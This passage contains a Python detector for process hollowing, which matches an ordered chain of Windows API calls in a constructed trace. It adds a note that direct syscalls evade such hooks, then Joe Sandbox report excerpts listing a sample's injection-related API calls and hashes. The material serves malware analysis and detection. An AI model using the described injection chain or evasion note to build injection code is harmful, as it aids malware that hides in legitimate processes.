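from typing import Dict, FrozenSet, List, Optional, Tuple


@dataclass(frozen=True)
class ApiCall:
    pid: int                 # process that made the call
    api: str                 # API name as the monitor logged it
    target: Optional[int]    # pid the call acts on (the new child for CreateProcess*); None = self


# Stages of the hollowing chain, in the order they must appear. Each stage
# accepts the Win32 name and its Nt* counterpart so a trace taken at either
# layer matches. Wow64SetThreadContext is the variant used when a 64-bit
# host manipulates a 32-bit (WOW64) child, as in this sample.
HOLLOWING_STAGES: List[Tuple[str, FrozenSet[str]]] = [
    ("spawn",   frozenset({"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"})),
    ("alloc",   frozenset({"VirtualAllocEx", "NtAllocateVirtualMemory"})),
    ("write",   frozenset({"WriteProcessMemory", "NtWriteVirtualMemory"})),
    ("context", frozenset({"Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"})),
    ("resume",  frozenset({"ResumeThread", "NtResumeThread"})),
]
WRITE_APIS = HOLLOWING_STAGES[2][1]


def match_stages(apis: List[str]) -> Optional[Dict[str, int]]:
    """Return the trace index at which each stage is first satisfied, walking
    the stages in order, or None if the chain never completes. Repeated calls
    (one WriteProcessMemory per PE header/section) collapse onto the first
    hit, and unrelated calls in between are ignored."""
    hits: Dict[str, int] = {}
    stage = 0
    for idx, api in enumerate(apis):
        if stage == len(HOLLOWING_STAGES):
            break
        name, accepted = HOLLOWING_STAGES[stage]
        if api in accepted:
            hits[name] = idx
            stage += 1
    return hits if stage == len(HOLLOWING_STAGES) else None


def detect_hollowing(trace: List[ApiCall]) -> List[Dict[str, object]]:
    """Group cross-process calls by (injector, target) and report every pair
    whose call sequence contains the full hollowing chain."""
    by_pair: Dict[Tuple[int, int], List[str]] = defaultdict(list)
    for call in trace:
        if call.target is not None and call.target != call.pid:
            by_pair[(call.pid, call.target)].append(call.api)
    findings: List[Dict[str, object]] = []
    for (injector, target), apis in sorted(by_pair.items()):
        hits = match_stages(apis)
        if hits is not None:
            findings.append({
                "injector": injector,
                "target": target,
                "stages": hits,
                "write_count": sum(1 for a in apis if a in WRITE_APIS),
                "read_back": "ReadProcessMemory" in apis,  # PEB read to locate the child's image base
            })
    return findings


# Constructed trace: pid 8 hollows child pid 9 in the order the execution graph
# shows; pid 20 is a benign parent that only spawns and resumes pid 21.
SAMPLE_TRACE: List[ApiCall] = [
    ApiCall(8, "GetModuleHandleW", None),
    ApiCall(8, "CreateProcessA", 9),          # child created suspended
    ApiCall(8, "ReadProcessMemory", 9),       # read the child's PEB for its image base
    ApiCall(8, "VirtualAllocEx", 9),          # reserve room for the payload image
    ApiCall(8, "WriteProcessMemory", 9),      # PE headers
    ApiCall(8, "WriteProcessMemory", 9),      # .text
    ApiCall(8, "WriteProcessMemory", 9),      # .data
    ApiCall(8, "Wow64SetThreadContext", 9),   # point the suspended thread at the new entry point
    ApiCall(8, "ResumeThread", 9),
    ApiCall(20, "CreateProcessA", 21),
    ApiCall(20, "ResumeThread", 21),
]

if __name__ == "__main__":
    for finding in detect_hollowing(SAMPLE_TRACE):
        print(finding)
```

The benign spawn-and-resume pair produces no finding because the alloc, write and context stages never occur, and the three WriteProcessMemory calls collapse onto one stage hit while still being counted. Two caveats apply when running this over real monitor output: the stage order requires the memory writes to precede the context change, so a loader that reorders them is missed, and a sample that issues direct syscalls bypasses user-mode API hooking altogether, so the calls never reach the trace in the first place.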

Control-flow Graph

Basic blocks 0x171d448-0x171d625 (rendered graph and executed/not-executed coloring omitted). API-bearing blocks: GetCurrentProcess in 0x171d448-0x171d4e7, GetCurrentThread in 0x171d4f0-0x171d524, GetCurrentProcess in 0x171d52d-0x171d561, GetCurrentThreadId in 0x171d58b-0x171d5ba; internal call to 0x171d627 from 0x171d56a-0x171d585.
APIs
• GetCurrentProcess.KERNEL32 ref: 0171D4D6
• GetCurrentThread.KERNEL32 ref: 0171D513
• GetCurrentProcess.KERNEL32 ref: 0171D550
• GetCurrentThreadId.KERNEL32 ref: 0171D5A9
Memory Dump Source
• Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 28dc0c7a0aa51badb69499cbe5ed251d484762e6723c485d7db797823f965160
• Instruction ID: f80d81552a0a25eb3dd7a7078951fa0149a8374786e7f415aa15353aec69cb00
• Opcode Fuzzy Hash: 28dc0c7a0aa51badb69499cbe5ed251d484762e6723c485d7db797823f965160
• Instruction Fuzzy Hash: D15157B09013498FDB18DFA9D548BDEBBF1EF88314F208459E419A73A4D7349984CF65

Control-flow Graph

Basic blocks 0x171d458-0x171d625 (rendered graph and executed/not-executed coloring omitted). API-bearing blocks: GetCurrentProcess in 0x171d458-0x171d4e7, GetCurrentThread in 0x171d4f0-0x171d524, GetCurrentProcess in 0x171d52d-0x171d561, GetCurrentThreadId in 0x171d58b-0x171d5ba; internal call to 0x171d627 from 0x171d56a-0x171d585.
APIs
• GetCurrentProcess.KERNEL32 ref: 0171D4D6
• GetCurrentThread.KERNEL32 ref: 0171D513
• GetCurrentProcess.KERNEL32 ref: 0171D550
• GetCurrentThreadId.KERNEL32 ref: 0171D5A9
Memory Dump Source
• Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: e7c9a5e0d3b08be6f5ca9bbbada323e18f8a171228a1b7576f418270af109926
• Instruction ID: 2df6a481a8a9b2b4e8e67c355c60f4e98fe76a567d98c4b4879e47bce49e3dc5
• Opcode Fuzzy Hash: e7c9a5e0d3b08be6f5ca9bbbada323e18f8a171228a1b7576f418270af109926
• Instruction Fuzzy Hash: EC5158B09013098FDB18DFAAD548BDEBBF1EF48314F208459E419A7394D7349984CF65

Control-flow Graph

Basic blocks 0x7674b15-0x7674e65 (rendered graph and executed/not-executed coloring omitted). API-bearing block: CreateProcessA in 0x7674caf-0x7674d69; the remaining blocks are argument-marshalling loops before the call and result handling after it.
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07674D56
Memory Dump Source
• Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 1f696f3d2ae52333888fd19aaec8ab2a8942958630c2b66b3e2cda942ba7b77c
• Instruction ID: 9f048cf6f10a97ee20951338d794a8ae0fbf82f3492ada930429b1efce38b555
• Opcode Fuzzy Hash: 1f696f3d2ae52333888fd19aaec8ab2a8942958630c2b66b3e2cda942ba7b77c
• Instruction Fuzzy Hash: 4BA16CB1D0025ACFDB10CFA8C8457EDBBB2FF48350F1485A9D85AA7290DB749985CF91

Control-flow Graph

Basic blocks 0x7674b20-0x7674e65 (rendered graph and executed/not-executed coloring omitted). API-bearing block: CreateProcessA in 0x7674caf-0x7674d69; same block layout as the 0x7674b15 entry above, with the entry block shifted.
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07674D56
Memory Dump Source
• Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: d8bac5d18d79e085c64def6ed6f003a3c139100c21bb84e28920402096570651
• Instruction ID: 3d8b3f474abf6179e1224dcc2dabdf15bb0c1ac48f7e5e7ee0c880c87c77e13b
• Opcode Fuzzy Hash: d8bac5d18d79e085c64def6ed6f003a3c139100c21bb84e28920402096570651
• Instruction Fuzzy Hash: 49917DB1D0025ACFDB10CFA8C8857EDBBB2FF48310F1485A9D85AA7290DB749985CF91

Control-flow Graph

Basic blocks 0x171adc8-0x171b048 (rendered graph and executed/not-executed coloring omitted). API-bearing block: GetModuleHandleW in 0x171b000-0x171b02b; internal calls to 0x171a120 (from 0x171add9), 0x171b051/0x171b060 (from 0x171adee), 0x171a12c (from 0x171ae80), 0x171a13c (from 0x171aec8), 0x171a14c and 0x171a15c (from 0x171aeee).
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0171B01E
Memory Dump Source
• Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 98597875457673c846561e2620d36586e24ecbddbd3bbc949ef8cb734e975804
• Instruction ID: f20df7f91a6ad71d6d82ca609ea74e526c1c9d426fa6116ea8f20b67a70bd682
• Opcode Fuzzy Hash: 98597875457673c846561e2620d36586e24ecbddbd3bbc949ef8cb734e975804
• Instruction Fuzzy Hash: 8D8135B0A01B458FDB24DF2DD44579AFBF1FF88204F00892ED18A97A58D735E849CB90

Control-flow Graph

Basic blocks 0x171449c-0x1715a61 (rendered graph and executed/not-executed coloring omitted). API-bearing block: CreateActCtxA in 0x171449c-0x17159d9, followed by result handling in 0x17159db-0x1715a61.
APIs
• CreateActCtxA.KERNEL32(?), ref: 017159C9
Memory Dump Source
• Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: de62824da77aba7579f120e72e029d7e88cf8f060d2418c25739e0f13a319ef4
• Instruction ID: c887e1064cf707ef168465f6b5c5f25c7273130997c732cf9ea4c79b747764d8
• Opcode Fuzzy Hash: de62824da77aba7579f120e72e029d7e88cf8f060d2418c25739e0f13a319ef4
• Instruction Fuzzy Hash: 9241B0B1C0071DCBDB24DFA9C884B9EBBB5BF8A314F20806AD409AB255DB756945CF90

APIs
• CreateActCtxA.KERNEL32(?), ref: 017159C9
Memory Dump Source
• Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 075D186F
Memory Dump Source
• Source File: 00000008.00000002.1775333310.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_75d0000_SIZfuXT.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0

APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07674928
Memory Dump Source
• Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07674928
Memory Dump Source
• Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07674A08
Memory Dump Source
• Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07674346
Memory Dump Source
• Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07674346
Memory Dump Source
• Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07674A08
Memory Dump Source
• Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0171D727
Memory Dump Source
• Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0171D727
Memory Dump Source
• Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07674846
Memory Dump Source
• Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07674846
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 4f2bec721d2c9adc98225f1cd0e8e30def4d7085c6c5ff569697a47e3d97326e
                                                                                                                                                  • Instruction ID: 055b6a8d3dfc6e856c617cb301f35ebb69850489d472ce827f88e2b379a030e8
                                                                                                                                                  • Opcode Fuzzy Hash: 4f2bec721d2c9adc98225f1cd0e8e30def4d7085c6c5ff569697a47e3d97326e
                                                                                                                                                  • Instruction Fuzzy Hash: 7D1126B19002499FCB10DFAAC845ADEBFF5EF88320F248819E519A7250CB75A944CFA4
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 85cda2c35356604eba2f442ef4581815557f9dc5ec413ab80e9a88fc26eb87c4
                                                                                                                                                  • Instruction ID: 4627e6fad58c5dbc2186e050a02f5feb7d88787f024da2163eb01202ef113a9c
                                                                                                                                                  • Opcode Fuzzy Hash: 85cda2c35356604eba2f442ef4581815557f9dc5ec413ab80e9a88fc26eb87c4
                                                                                                                                                  • Instruction Fuzzy Hash: 7B1146B19003488BCB24DFAAD845BDEFFF5AB88324F20841AD519A7240CB35A944CBA4
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 074861ad9d334804c60e707e3176d818c2ec28aef5f983920838a380b180e1b2
                                                                                                                                                  • Instruction ID: 95d3a1bcbd92be700e30b6b6c3d10b548e30a4c0fb2a33d8ba4bc3783c36daaa
                                                                                                                                                  • Opcode Fuzzy Hash: 074861ad9d334804c60e707e3176d818c2ec28aef5f983920838a380b180e1b2
                                                                                                                                                  • Instruction Fuzzy Hash: 021125B19003498BCB10DFAAC84979EFBF5EF88324F24881AD519A7240CB75A944CBA4
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0171B01E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: 4bc131d005740c86fd7d9cba332ff5212b98ea9b8f8f420e6b889b4ea36b8315
                                                                                                                                                  • Instruction ID: 5c77ac7cc3fd077d58ce84199d27bd23d16f59b23ee89a4100ce5757b38e1eda
                                                                                                                                                  • Opcode Fuzzy Hash: 4bc131d005740c86fd7d9cba332ff5212b98ea9b8f8f420e6b889b4ea36b8315
                                                                                                                                                  • Instruction Fuzzy Hash: 1B110FB5C003498FDB14DF9AD844B9EFBF4AB88320F10842AD529A7210D375A545CFA1
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 076778FD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: 057bae62d130dd890bbae8a235402bce93b29f8472731f14945206669c045af2
                                                                                                                                                  • Instruction ID: df063d9a24f6e8b1029bd88308db5a350d692960ea487204350ef0ac9cfe3cd6
                                                                                                                                                  • Opcode Fuzzy Hash: 057bae62d130dd890bbae8a235402bce93b29f8472731f14945206669c045af2
                                                                                                                                                  • Instruction Fuzzy Hash: 131103B5800349DFCB10DF9AD889BDEBBF8EB48320F10841AE519A7241D375A944CFA5
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 076778FD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: 34b5d32bfaff243f2cf4c5a8d497b91a9278b1e219c6b333d0dfb74faa098afc
                                                                                                                                                  • Instruction ID: 2fe0ebe0adc962aee95c36203f4194ade4cdb911c2ef19a565f22ef624d85d9c
                                                                                                                                                  • Opcode Fuzzy Hash: 34b5d32bfaff243f2cf4c5a8d497b91a9278b1e219c6b333d0dfb74faa098afc
                                                                                                                                                  • Instruction Fuzzy Hash: AA1103B58003499FCB10DF9AD845BDEBBF8EB48320F10841AD519A7240C375AA44CFA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763037297.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_146d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d53a1ca04de1113ec52332086e575b54446f16da07c36f205c38d672500ab2e9
                                                                                                                                                  • Instruction ID: bdec4b874b0ce9ffc21aaca895548b3f3db314bb0ffccb2688d2b4615949c6b7
                                                                                                                                                  • Opcode Fuzzy Hash: d53a1ca04de1113ec52332086e575b54446f16da07c36f205c38d672500ab2e9
                                                                                                                                                  • Instruction Fuzzy Hash: F621F471A04240DFDB05DF58D9C0B26BF69FB8831CF24C56AD9490A766C336D816C6A2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763037297.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_146d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c2474df5a99daab420ee4d03639b20be7365290aef235e36a8a7769cc2ea38ab
                                                                                                                                                  • Instruction ID: 79e8a9094c6fe6e5a7973b3f35042d01854c0aa161920c45ba7aea983fddba8b
                                                                                                                                                  • Opcode Fuzzy Hash: c2474df5a99daab420ee4d03639b20be7365290aef235e36a8a7769cc2ea38ab
                                                                                                                                                  • Instruction Fuzzy Hash: B2212771A00244DFDB05DF44C9C0B56BF69FB98328F24C57AD94A0B366C336E856CAA2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763153940.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_147d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5f07945ce9379632b0e21d08fef7925bc53684bf1e61e5990f1ee599f3ab8d96
                                                                                                                                                  • Instruction ID: 2734351cc54fa3513db264c1368ca8f1612d40ccfeaf775b8f45e69368e0ec1f
                                                                                                                                                  • Opcode Fuzzy Hash: 5f07945ce9379632b0e21d08fef7925bc53684bf1e61e5990f1ee599f3ab8d96
                                                                                                                                                  • Instruction Fuzzy Hash: BC21F571A14200EFDB05DF98D9C4B66BBA5FF84324F24CA6ED90A4B362C336D407CA61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763153940.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_147d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6b9856f31ca6ea1d6e85a50bf45b1be7814fe512f0f7c333faa550d381dff17d
                                                                                                                                                  • Instruction ID: 62d1ec192a5d50919074a4b4727392a3c7462371f45bfc2b479c021d9cca4cbd
                                                                                                                                                  • Opcode Fuzzy Hash: 6b9856f31ca6ea1d6e85a50bf45b1be7814fe512f0f7c333faa550d381dff17d
                                                                                                                                                  • Instruction Fuzzy Hash: D62125B5A04280DFCB16DF58D9C4B56BBA5FF84318F24C56ED90A0B366C336D407CA61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763153940.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_147d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 170938223c415421a8dcddc5df810cea5f761d8ac959fce4440da526d7ad42a4
                                                                                                                                                  • Instruction ID: 51da3d625a20e9dbc128c5b4d578d9dfec60786e4a697f92f35ef1dec007b03e
                                                                                                                                                  • Opcode Fuzzy Hash: 170938223c415421a8dcddc5df810cea5f761d8ac959fce4440da526d7ad42a4
                                                                                                                                                  • Instruction Fuzzy Hash: 52217F755093C08FDB03CF24D994756BF71EF46218F28C5DAD8498B6A7C33A980ACB62
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1763037297.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_146d000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
• API String ID:
• Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction ID: 4f691a3eefcbdcca6220172678988635ddedad895ef3143e1c9f1a3cf52f5f81
• Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction Fuzzy Hash: 8311D276904240CFDB02CF44D5C4B56BF71FB84324F24C2AAD9490B266C33AD856CB92
Memory Dump Source
• Source File: 00000008.00000002.1763037297.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_146d000_SIZfuXT.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction ID: b499a477ee8621ccb7e537da6caedb5ea5629223c3f331c91fb9ed25aad9c0a2
• Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction Fuzzy Hash: 5F11B476A04280CFDB16CF54D5C4B16BF71FB84328F24C5AAD9450B666C336D456CB92
Memory Dump Source
• Source File: 00000008.00000002.1763153940.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_147d000_SIZfuXT.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
• Instruction ID: 73ae22f2662ffe5cbe09670657bf277852219c176937d501dbdea5e8fde94a77
• Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
• Instruction Fuzzy Hash: ED11A975904280DFDB12CF54C5C4B16BBA2FB84224F28C6AAD8494B3A6C33AD40ACB61

Execution Graph

Execution Coverage: 0.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 38
Total number of Limit Nodes: 3
Execution graph (rendered graph omitted): entry nodes 5612c00 and 561096e; labelled nodes call LdrInitializeThunk and GetPEB, with runtime helpers ___swprintf_l, __startOneArgErrorHandling, __except_handler4, __cftof and __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.

Control-flow Graph

Control-flow graph (rendered graph omitted): block 0 (5612c0a-5612c0f) -> block 1 (5612c11-5612c18); block 0 -> block 2 (5612c1f-5612c26, LdrInitializeThunk).
APIs
• LdrInitializeThunk.NTDLL(0562FD4F,000000FF,00000024,056C6634,00000004,00000000,?,-00000018,7D810F61,?,?,055E8B12,?,?,?,?), ref: 05612C24
Memory Dump Source
• Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
• Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmp
